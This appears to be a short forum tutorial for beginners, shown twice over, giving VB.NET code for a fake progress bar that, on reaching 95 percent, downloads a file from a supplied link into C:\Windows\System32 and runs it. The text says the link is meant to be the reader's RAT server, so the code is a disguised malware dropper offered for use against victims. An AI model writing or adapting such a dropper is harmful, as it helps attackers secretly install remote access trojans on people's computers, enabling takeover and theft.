Hello N0bz
you need:
ProgressBar1
Timer1
under timer1-click:
ProgressBar1.Increment(+5)
If ProgressBar1.Value = 95 Then
My.Computer.Network.DownloadFile("link", "C:\Windows\System32\data.exe")
Process.Start("C:\Windows\System32\data.exe")
Else
End If
in the link= direct link your server rat or etc
in destenation choose your directory save file example:
C:\Windows\System32\data.exe
you need:
ProgressBar1
Timer1
under timer1-click:
ProgressBar1.Increment(+5)
If ProgressBar1.Value = 95 Then
My.Computer.Network.DownloadFile("link", "C:\Windows\System32\data.exe")
Process.Start("C:\Windows\System32\data.exe")
Else
End If
in the link= direct link your server rat or etc
in destenation choose your directory save file example:
C:\Windows\System32\data.exe
Sign up here with your email